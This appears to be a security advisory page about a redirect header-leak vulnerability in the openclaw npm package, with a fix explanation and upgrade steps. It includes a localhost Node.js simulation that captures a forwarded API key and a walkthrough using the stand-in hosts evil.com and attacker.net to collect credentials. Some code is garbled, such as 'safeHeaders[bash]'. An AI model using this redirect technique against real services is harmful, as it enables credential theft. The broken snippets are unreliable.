OpenClaw (npm), Header Leak via Redirect, CVE-2026-XXXXX (Critical)

Listen to this Post

The vulnerability resides in the `fetchWithSsrFGuard` function, which is designed to make HTTP requests with security considerations. In affected versions, this function followed cross-origin redirects while preserving almost all of the original HTTP headers from the initial request. The function implemented a narrow denylist, only stripping Authorization, Proxy-Authorization, Cookie, and `Cookie2` headers. This approach proved insufficient because many applications and APIs use custom headers for authentication, such as X-Api-Key, Private-Token, or `Bearer` tokens in non-standard headers. When an attacker controlled a server that issued a redirect to a different origin (for example, from `api.legitimate.com` to attacker.net), the OpenClaw client would faithfully forward all the original headers—including these custom credentials—to the attacker’s server. The root cause was treating security as a denylist problem rather than an allowlist problem. The fix, implemented in commit 46715371, fundamentally changes the approach. Instead of trying to block specific sensitive headers, the patched version implements a safe-header allowlist. When a cross-origin redirect occurs, only a predefined set of benign headers survive the transition. These include standard headers for content negotiation (like Accept, Accept-Language, Content-Type) and cache validation (like If-None-Match, If-Modified-Since). All other headers, especially any custom or authorization-related ones, are stripped from the redirected request. This ensures that credentials intended for the original destination are never inadvertently leaked to a third-party origin during a redirect chain.

DailyCVE Form:

Platform: npm/openclaw
Version: <=2026.3.2
Vulnerability : Header leak
Severity: Critical
date: March 8, 2026

Prediction: March 8, 2026

What Undercode Say:

Analytics

The vulnerability can be analyzed by inspecting the behavior of `fetchWithSsrFGuard` during a redirect. The following commands and code snippets demonstrate how to identify the vulnerable version and simulate the issue.

1. Check Installed Version:

Check the globally installed version of openclaw
npm list -g openclaw
Check the version in a local project
npm list openclaw

2. Simulate the Vulnerable Behavior:

The following Node.js script demonstrates how a vulnerable OpenClaw client would forward a custom `X-Api-Key` header to a malicious redirect target.

node -e "
const http = require('http');
// Create a malicious redirect server
const attackerServer = http.createServer((req, res) => {
console.log('[bash] Received request with headers:');
console.log(req.headers);
console.log('[bash] Credential stolen:', req.headers['x-api-key']);
res.end('Stolen');
});
attackerServer.listen(18888, () => {
console.log('[bash] Listening for stolen credentials on port 18888');
});
// Create a server that redirects to the attacker
const redirector = http.createServer((req, res) => {
console.log('[bash] Redirecting to attacker');
res.writeHead(302, { 'Location': 'http://localhost:18888' });
res.end();
});
redirector.listen(18889, () => {
console.log('[bash] Listening on port 18889');
// Simulate OpenClaw's fetchWithSsrFGuard (vulnerable behavior)
const options = {
hostname: 'localhost',
port: 18889,
path: '/',
method: 'GET',
headers: {
'X-Api-Key': 'sk_test_12345_secret',
'Authorization': 'Bearer should_be_stripped',
'Accept': 'application/json'
}
};
const req = http.request(options, (res) => {
console.log('[bash] Received response from redirect target');
});
req.end();
});
"

3. Verify the Fix (Allowlist Logic):

The fix implements an allowlist. The following conceptual code shows the change in logic.

// Conceptual example of the fix in fetchWithSsrFGuard
const SAFE_HEADERS_ALLOWLIST = new Set([
'accept', 'accept-language', 'content-type',
'if-none-match', 'if-modified-since', 'cache-control'
]);
function prepareRedirectHeaders(originalHeaders) {
const safeHeaders = {};
for (const [name, value] of Object.entries(originalHeaders)) {
if (SAFE_HEADERS_ALLOWLIST.has(name.toLowerCase())) {
safeHeaders[bash] = value;
}
}
return safeHeaders;
}

How Exploit:

An attacker can set up a server that responds to a request with an HTTP redirect (302 or 301) pointing to a different domain under their control.
1. Attacker Setup: The attacker controls `evil.com` and crafts a URL that the OpenClaw application will fetch. This could be a link the user clicks, or a resource the AI agent is instructed to retrieve.
2. Victim Request: The OpenClaw client makes a request to the attacker’s initial URL (e.g., https://evil.com/fetch`) and includes a custom sensitive header likeX-API-Key: secret123.
3. Redirect Response: `evil.com` responds with an HTTP 302 redirect to
https://attacker.net/collect`.
4. Credential Leak: The vulnerable OpenClaw client follows the redirect to `attacker.net` and, critically, re-sends the `X-API-Key: secret123` header with the new request. The attacker’s server at `attacker.net` logs the incoming request and captures the header.

Exploit Command (Trigger):

An attacker would not use a command directly on the victim’s machine. Instead, they would trick the OpenClaw instance into fetching a malicious URL. This could be achieved through social engineering or, if the AI agent processes untrusted input, by providing a URL like:

https://evil.com/redirect-to-attacker

The `evil.com` server would be configured with the following simple HTTP response:

HTTP/1.1 302 Found
Location: https://attacker.net/collect

Protection from this CVE

  1. Immediate Upgrade: Update the `openclaw` npm package to the patched version.
    npm install [email protected]
    or, for global installations
    npm install -g [email protected]
    
  2. Verify the Patch: Ensure the fix commit is present in your local installation.
    cd node_modules/openclaw
    git log --oneline | grep 46715371
    
  3. Network Segmentation (Defense in Depth): Even with the patch, applications should follow the principle of least privilege. Outbound network policies should restrict which external endpoints the OpenClaw service can communicate with, limiting the impact of any potential future redirects.

Impact

Successful exploitation of this vulnerability allows a remote, attacker-controlled server to receive sensitive credentials. These credentials are typically custom authorization headers like X-Api-Key, Private-Token, or application-specific bearer tokens. The impact is a severe confidentiality breach. An attacker who captures these credentials can then impersonate the legitimate OpenClaw application or its user to the original service the headers were intended for, leading to unauthorized data access, privilege escalation, or further account compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top